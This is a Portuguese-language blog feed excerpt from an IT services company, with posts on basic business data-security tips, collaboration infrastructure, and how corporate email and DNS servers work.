&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjayzs7FpdgV8a3_BTPOnvxRl2R3mRdaD_FMrX2n-37J8vQ_N4gLw_Nrn0NtH2QLMTpNVrJiqSS3QGAZ-QGNwaDc-DVNbn9KURY0gyUijF1yeQyTCWpiUwY2EmGsTbmQu1QL41sR1hLKwU/s1600/banner+C.C.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;216&quot; data-original-width=&quot;407&quot; height=&quot;169&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjayzs7FpdgV8a3_BTPOnvxRl2R3mRdaD_FMrX2n-37J8vQ_N4gLw_Nrn0NtH2QLMTpNVrJiqSS3QGAZ-QGNwaDc-DVNbn9KURY0gyUijF1yeQyTCWpiUwY2EmGsTbmQu1QL41sR1hLKwU/s320/banner+C.C.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 18px;&quot;&gt;5 – Inimigos internos:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 18px;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTfT9O6CwPdTk35YyGlwFUw-p2MOe1DXweWm4tE8tpoxHw_fdFSXmsuHWTGmXKXAAAoTPhf2739gLyuvX-7R11Fp-Rxmn3b9F7G-PhuQiargW2iaN840ang3-5ZSn76lMXTcrV9p2KmHk/s1600/2.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;640&quot; data-original-width=&quot;1000&quot; height=&quot;204&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTfT9O6CwPdTk35YyGlwFUw-p2MOe1DXweWm4tE8tpoxHw_fdFSXmsuHWTGmXKXAAAoTPhf2739gLyuvX-7R11Fp-Rxmn3b9F7G-PhuQiargW2iaN840ang3-5ZSn76lMXTcrV9p2KmHk/s320/2.jpeg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;Parece banal, mas grande parte das empresas tem suas informações corrompidas pelo próprio quadro de funcionários, sendo eles ativos ou ex-funcionários. O motivo é óbvio, o acesso às informações da empresa está aberto para todos que trabalham na organização, por isso é essencial que exista uma limitação de acessos por usuário.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Está cada vez mais difícil de escapar dos cyber-ataques, infelizmente a tecnologia utilizada pelos hackers só evolui, por isso a dica para as empresas é: veja o trabalho de segurança de dados como um investimento e monte uma estratégia de segurança da informação, olhando sempre para todo seu ecossistema, assim como para as ferramentas usadas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Veja algumas dicas para preparar sua empresa contra ameaças futuras:&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
1- Implante ferramentas que notifiquem em tempo real as atividades suspeitas em hardware e aplicativos de rede.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
2 – Crie um Programa de Treinamento e Conscientização sobre segurança de dados com o quadro de funcionários.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
3- Faça controle de acesso prioritário para usuários: se você utiliza um software na sua empresa, ele deve ter histórico das ações e acessos diferentes para usuários, contendo as informações que são necessárias para desempenhar o seu trabalho. Isso é muito importante para que somente as pessoas certas tenham acesso a determinados dados.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
4- Realize backup periódicos. Indiferente se seus dados são armazenados em servidor local ou em Data Center contratado a realização de backup periódicos são fundamentais. Algumas empresas realizam backup mensal, o que pode ser um bom começo, mas ainda expõe a empresa a ficar parada sem ter o histórico de possíveis 30 dias em caso de sequestro de dados. Outras empresas, mais precavidas realizem o procedimento diariamente, ao final de cada período do dia ou até de hora em hora.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
5- Hospede as informações da sua empresa em um Data Center seguro, com normas de segurança bem definidas, back-up de dados e com excelente reputação.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlWsp5xW3IwMkwmRDfg8cK2bDFBhSF-lT92cMFPYRFMUHDk-ctK4JtrM97W_pmOqyxwOeFOsVpxan8PmjeaxmFpUR2v7S9dY8AN7QzPP5G8ZVz_dq2YQDEOA1IGXJDddstRDiI3rTkNv0/s1600/anuncie2.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;60&quot; data-original-width=&quot;468&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlWsp5xW3IwMkwmRDfg8cK2bDFBhSF-lT92cMFPYRFMUHDk-ctK4JtrM97W_pmOqyxwOeFOsVpxan8PmjeaxmFpUR2v7S9dY8AN7QzPP5G8ZVz_dq2YQDEOA1IGXJDddstRDiI3rTkNv0/s1600/anuncie2.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
6- Garanta a criptografia dos dados: principalmente para dispositivos móveis. Arquivos com relatórios sensíveis, como planilhas financeiras, planos de marketing e minutas de contratos, devem ser protegidos por sistemas de criptografia.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
7-  Adote termos de confidencialidade! Muitas vezes, funcionários, colaboradores terceirizados e fornecedores externos precisam acessar dados de sua empresa para realizar suas atividades. O ideal é que para esse tipo de relação seja pré-estabeleciado termos de confidencialidade.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQSGGYaTx-3N6txYKq5Uhi45mjbybM7y42PcXCYnLxkwxxBN_JURQUMuY-Nz-Vb1KW2G50i7uxrXKnikGekgZaffsgLO_JNoIlJvXz9GHCpVPBo4WEbnKAEU2a_9bLRUKKDParOW4_aVs/s1600/3.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;434&quot; data-original-width=&quot;710&quot; height=&quot;195&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQSGGYaTx-3N6txYKq5Uhi45mjbybM7y42PcXCYnLxkwxxBN_JURQUMuY-Nz-Vb1KW2G50i7uxrXKnikGekgZaffsgLO_JNoIlJvXz9GHCpVPBo4WEbnKAEU2a_9bLRUKKDParOW4_aVs/s320/3.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Com essas dicas em prática, sua empresa estará muito mais segura, até porque fazer um cyber-ataque a uma empresa que tenha tomado as devidas precauções pode ser um risco!&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Então está mais do que na hora da sua empresa fazer o que todas as empresas do Brasil e do mundo estão fazendo e investir em tecnologia da informação. Mas tem mais um fator que você deve considerar: como mencionamos, a tecnologia utilizada pelos hackers evolui muito rápido, então, caso você não tenha uma equipe de TI especializada, nossa última dica é manter o foco no seu negócio, e contar com o suporte de uma empresa especialista em tecnologia de informação para assegurar sua empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihIQFz5RIzWtQUwkY0NemqshPvRQyWrrV51V91fT3rj2HQfhYovluofdSXewIO2ZzLORqRhMP04VXDio5Jabo4ypF31GEldvsUPbnZYzvnSI_YiZ35KVs4aVSUH9atZMzliAeG-EZy9Kg/s1600/baneer.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;340&quot; data-original-width=&quot;1600&quot; height=&quot;90&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihIQFz5RIzWtQUwkY0NemqshPvRQyWrrV51V91fT3rj2HQfhYovluofdSXewIO2ZzLORqRhMP04VXDio5Jabo4ypF31GEldvsUPbnZYzvnSI_YiZ35KVs4aVSUH9atZMzliAeG-EZy9Kg/s400/baneer.jpeg&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;</description><link>http://computersservicetecnica.blogspot.com/2018/08/seguranca-da-informacao-em-empresas.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMs3a0YmFhFd4JmjKAK_BaByfb-G1nYnHplLaWUkCLZJkI7_r3hChPKz9nG8FVy8UzWTgGKVu5efoeeO5fqNTBVlrMCqTFz6F3Zh8t3BwvUddVi9O_9fr_nA5CNc2Du1LwB8QPwI0-GS4/s72-c/1.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-6172096324376052505</guid><pubDate>Sun, 05 Aug 2018 19:49:00 +0000</pubDate><atom:updated>2018-08-05T16:49:37.939-03:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 22px;&quot;&gt;Conectividade: a importância de preparar-se com uma estrutura de colaboração adequada&lt;/span&gt;&lt;/h2&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV7lOmdFxQaGp55PSYRY_Zr1ooIiYYJ5yNUWmpe1w8_C30fkbt503pDbynN5Qt5ctPNIOPeqIBIKmkTUAYG4A0dHJK-RpgDIhTW6sVSpWH9_HWoVJSldgJA9K9AjWMutI1N8B6NpGlpyY/s1600/colaborador.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;393&quot; data-original-width=&quot;538&quot; height=&quot;276&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV7lOmdFxQaGp55PSYRY_Zr1ooIiYYJ5yNUWmpe1w8_C30fkbt503pDbynN5Qt5ctPNIOPeqIBIKmkTUAYG4A0dHJK-RpgDIhTW6sVSpWH9_HWoVJSldgJA9K9AjWMutI1N8B6NpGlpyY/s640/colaborador.jpg&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Conectividade e mobilidade são mandatórias no mundo corporativo. Isto é algo que não se questiona. O cenário atual é de um ambiente cada vez mais competitivo, em que aumentar a produtividade e melhorar a eficiência faz toda a diferença para a sobrevivência dos negócios. E, por mais que isso não seja novidade, ainda há dúvidas se as empresas estão realmente preparadas para a colaboração e para a era da mobilidade.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
No Brasil, segundo estimativas de conhecida empresa de espaços compartilhados, 55% dos brasileiros fazem pelo menos um dia de home-office por semana. E, por mais que as empresas já estejam aderindo a essa tendência irreversível, cerca de 20% delas alega que um dos desafios de se trabalhar remotamente é a dificuldade de acesso aos documentos da empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Um estudo do Gartner também confirma esse despreparo: até 2020, 75% das empresas irão enfrentar rupturas consideráveis de negócios por não estarem alinhadas com as competências de infraestrutura e operações que o momento exige.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s1600/baneer.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;340&quot; data-original-width=&quot;1600&quot; height=&quot;88&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC2mg2akZkzU6q32xwHHdYTePCMOJnr1VY_zRwL0jIG5S9ifyutrkmfko8exnU8J6TYUrslQ0DvnhJn1m1RixEfCs16Tk3zjdZPr2RTBOEoQobosanlPAXKFJF_c2x-PMPXDjbLuftltQ/s320/baneer.jpeg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Mas, o que realmente dá vida e coloca em prática a conectividade? A resposta encontra-se nas soluções de colaboração, que permitem a implementação e manutenção da conectividade e adesão ao real cenário de mobilidade, possibilitando o fornecimento de serviços a qualquer hora e em qualquer lugar. Elas facilitam a interação entre os usuários e entre a fonte dos dados. Aliás, essa é a vantagem da mobilidade: acessar dados, áudio, vídeos e pessoas de qualquer lugar.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Está mais do que na hora das empresas brasileiras investirem em infraestrutura de colaboração, especialmente cloud computing, para não correrem o risco de ficar para trás neste cenário. Investir em soluções de redes sem fio, videoconferência, softphone, comunicações unificadas, data center e outros softwares, é algo urgente. Porém, para que uma empresa consiga desfrutar dos benefícios destes recursos inovadores, é preciso escolher uma infraestrutura acessível e de alto desempenho, que consiga suportar muitos dispositivos móveis e aplicativos em nuvem, em tempo real.&lt;/div&gt;

&lt;br&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjayzs7FpdgV8a3_BTPOnvxRl2R3mRdaD_FMrX2n-37J8vQ_N4gLw_Nrn0NtH2QLMTpNVrJiqSS3QGAZ-QGNwaDc-DVNbn9KURY0gyUijF1yeQyTCWpiUwY2EmGsTbmQu1QL41sR1hLKwU/s1600/banner+C.C.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;216&quot; data-original-width=&quot;407&quot; height=&quot;169&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjayzs7FpdgV8a3_BTPOnvxRl2R3mRdaD_FMrX2n-37J8vQ_N4gLw_Nrn0NtH2QLMTpNVrJiqSS3QGAZ-QGNwaDc-DVNbn9KURY0gyUijF1yeQyTCWpiUwY2EmGsTbmQu1QL41sR1hLKwU/s320/banner+C.C.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Além disso, a empresa deve ter em mente que tudo deve ser realizado com o máximo de segurança possível – o que geralmente é o “ponto falho” da maioria das soluções desenvolvidas para usuários. Uma visão 360º do que precisa ser feito, o apoio de um parceiro de TI especializado em soluções de colaboração e uma infraestrutura de data center de qualidade e adequada, vão fazer toda a diferença nesse sentido.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Em suma, é evidente que a conectividade deve ser sim o primeiro passo. Mas, somente a partir da compreensão do seu papel, bem como da combinação correta das tecnologias que viabilizam a colaboração, é que será possível alcançar a tão sonhada vantagem competitiva. Aí sim as empresas estarão preparadas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Fonte: http://helpdigitalti.com.br/blog/conectividade-a-importancia-de-preparar-se-com-uma-estrutura-de-colaboracao-adequada/&lt;/div&gt;
&lt;br /&gt;</description><link>http://computersservicetecnica.blogspot.com/2018/08/conectividade-importancia-de-preparar.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV7lOmdFxQaGp55PSYRY_Zr1ooIiYYJ5yNUWmpe1w8_C30fkbt503pDbynN5Qt5ctPNIOPeqIBIKmkTUAYG4A0dHJK-RpgDIhTW6sVSpWH9_HWoVJSldgJA9K9AjWMutI1N8B6NpGlpyY/s72-c/colaborador.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-1780343600637379047</guid><pubDate>Thu, 02 Aug 2018 15:49:00 +0000</pubDate><atom:updated>2018-08-02T12:49:28.363-03:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 22px;&quot;&gt;E-mail corporativo: TUDO o que você precisa saber.&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O que chamamos de e-mail corporativo, nada mais é do que ter um serviço de e-mail usando um domínio próprio da empresa, ao invés de utilizar sistemas gratuitos como Hotmail ou Gmail. Quando sua empresa tem um e-mail empresarial, seus endereços de e-mail vão ser parecidos com esse - seunome@nomedasuaempresa.com.br.
&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
De cara já dá para perceber que é muito mais profissional e passa muito mais credibilidade para seus clientes e parceiros, utilizar um e-mail com o nome da sua empresa do que algo como @gmail.com ou @outlook.com, concorda?&lt;/div&gt;
&lt;br /&gt;
Neste artigo veremos algo sobre o e-mail corporativo.
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Como implantar um na sua empresa, quais os tipos de servidores de e-mail e muito mais&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Continue a leitura e vire um expert no assunto!&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;1º O que é E-mail Corporativo?&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O termo e-mail significa eletronic mail, ou, em português, correio eletrônico e foi inventado em 1971 por Ray Tomlinson – Se você quiser ou se interessar em se aprofundar na história segue o link = https://pt.wikipedia.org/wiki/E-mail#Hist%C3%B3ria&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O termo E-mail Corporativo é usado para definir serviços de e-mail que foram desenhados para atender necessidades específicas das empresas. Algumas dessas necessidades são:&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Poder usar o domínio da empresa no endereço de e-mail dos funcionários. Algo como seunome@nomedasuaempresa.com.br.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJIc-66BO4FYMKAIUH9n2UGAgIASiWuGVx3AweUzr2GgIU5Ri2bdC5T_ACwtKiLpm7GT2hELRe_LpS5FvAW3JtUSHkzPd0q6BUek0hJE1mx7vhzoYC_t9Xos-8QNrdRd0LpdTB6NGTGMo/s1600/baneer.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;340&quot; data-original-width=&quot;1600&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJIc-66BO4FYMKAIUH9n2UGAgIASiWuGVx3AweUzr2GgIU5Ri2bdC5T_ACwtKiLpm7GT2hELRe_LpS5FvAW3JtUSHkzPd0q6BUek0hJE1mx7vhzoYC_t9Xos-8QNrdRd0LpdTB6NGTGMo/s320/baneer.jpeg&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
- Ter o controle sobre quem pode enviar ou receber e-mails em nome da empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
- Controlar as informações da empresa de forma centralizada.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
- Poder ter backups das mensagens trocadas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
- Poder compartilhar informações entre os usuários do sistema de e-mail como agendas e contatos.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Quando se usa um bom sistema de e-mail personalizado para sua empresa, você tem o controle de tudo que seus colaboradores enviam ou recebem, evitando assim distrações com mensagens que não são pertinentes ao trabalho. O que não seria possível se você usasse um sistema de e-mails gratuito como Gmail e Hotmail.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Mais à frente veremos as diferenças entre um sistema de e-mail corporativo e um gratuito, e por que sua empresa não deve usar um sistema gratuito de e-mails.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;2º O que precisa para ter um e-mail com nome da empresa&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Para um sistema de e-mail funcionar é preciso basicamente duas coisas: um servidor de e-mail e um servidor DNS. Esses serviços podem ser contratados de provedores ou mesmo hospedados na sua empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;3º O que é servidor DNS&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Um servidor DNS é o responsável por localizar o endereço do servidor do seu site quando alguém digita o seu domínio. Um exemplo.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Quando alguém digita www.seudominio.com.br no navegador, envia uma requisição para o servidor DNS que indica para o seu computador qual servidor está hospedado seu site.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Se você mandar um e-mail para um e-mail tipo comercio@comercio.com.br, o servidor DNS vai redirecionar a requisição para o servidor de e-mail que irá tratar a mensagem e enviar a quem cuida dessa caixa postal.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Essa é uma explicação bem simplória do que é um servidor DNS, mas é o suficiente para que você entenda o conceito.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;4º O que é um servidor de e-mail&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Continuando com o exemplo acima, assim que o servidor DNS redireciona o e-mail para meu servidor de e-mail, ele receberá a mensagem e a tratará conforme as regras que foram definidas pelo administrador.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqid5tNz3qeiV34xgDf9hoc2ekBBx_10TpBlqBRRsDtyXEjYNFC1M8c600-Duwq9x6hiY4Oxgea-16a1-AdYE0SVlTotT6jsyDQyVLH18HmjIOt8R3y0E1OgbUU1SgFfKzRRrSiJ_cD6U/s1600/banner+C.C.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;216&quot; data-original-width=&quot;407&quot; height=&quot;169&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqid5tNz3qeiV34xgDf9hoc2ekBBx_10TpBlqBRRsDtyXEjYNFC1M8c600-Duwq9x6hiY4Oxgea-16a1-AdYE0SVlTotT6jsyDQyVLH18HmjIOt8R3y0E1OgbUU1SgFfKzRRrSiJ_cD6U/s320/banner+C.C.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Um servidor de e-mail basicamente é um serviço que recebe as mensagens enviadas para sua empresa e as direciona para um dos destinatários, além de também controlar a segurança para que ninguém leia a sua mensagem a não ser somente você.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Existem vários tipos de servidores ou serviços de e-mail. Abaixo vamos falar sobre cada um deles.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;5º Tipos de servidores de e-mail&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Existem basicamente quatro tipos de serviços ou servidores de e-mail no mercado. Abaixo faço uma análise sobre cada tipo.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;6º Serviço de e-mail gratuito&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Nessa categoria entram os serviços do Gmail (Google), Hotmail (Atual outlook Microsoft) e similares. São serviços gratuitos de e-mail que oferecem a possibilidade para que você possa ter o seu próprio endereço de e-mail.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Estes serviços são extremamente limitados e fazem dinheiro vendendo publicidade e seu histórico de navegação. Não vou entrar em mais detalhes agora, pois temos mais abaixo um tópico detalhado de por que você não deve usar um serviço de e-mail gratuito na sua empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O que importa é que tenha em mente que esses são serviços exclusivos para uso doméstico e não empresarial.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;7º os servidores de e-mail, de provedores de hospedagem&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Aqui já entram os serviços de e-mail oferecidos por provedores como Locaweb, Hostgator e tantas outras centenas de provedores de hospedagem compartilhada.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Além de poder hospedar a sua página na Internet (Identidade digital – sua empresa vista no mundo), você pode ter seu e-mail mais professional (seunome@seudominio.com.br), aonde você poderá usar o nome de sua empresa e ou recursos de sua empresa, como exemplo atendimento@seudominio.com.br&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFsIFEqHjj7kYwIS4_RWb6hp_kWSAviqJ7J6eTIeFDERPZn_Nj8DOAI-Rjx2lhxYvtSp4D2J6hg9OZaD5HxzU4MKPbYX6PO7bPFk4yJoLKy-R3e3MxAreYbUD1TCPFu6j0j7sEBf_B-bQ/s1600/anuncie2.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;60&quot; data-original-width=&quot;468&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFsIFEqHjj7kYwIS4_RWb6hp_kWSAviqJ7J6eTIeFDERPZn_Nj8DOAI-Rjx2lhxYvtSp4D2J6hg9OZaD5HxzU4MKPbYX6PO7bPFk4yJoLKy-R3e3MxAreYbUD1TCPFu6j0j7sEBf_B-bQ/s1600/anuncie2.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Para empresas de grande porte (aonde possuem seu próprio data-center), podem usar dos modelos gratuitos ou pagos, como softwares Open Source como Zimbra e similares ou os pagos como o Exchange da Microsoft.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;8º Servidor de e-mail empresarial na nuvem&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Esse é um movimento que cresceu muito nos últimos 02 anos. Várias empresas estão seguindo essa tendência.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
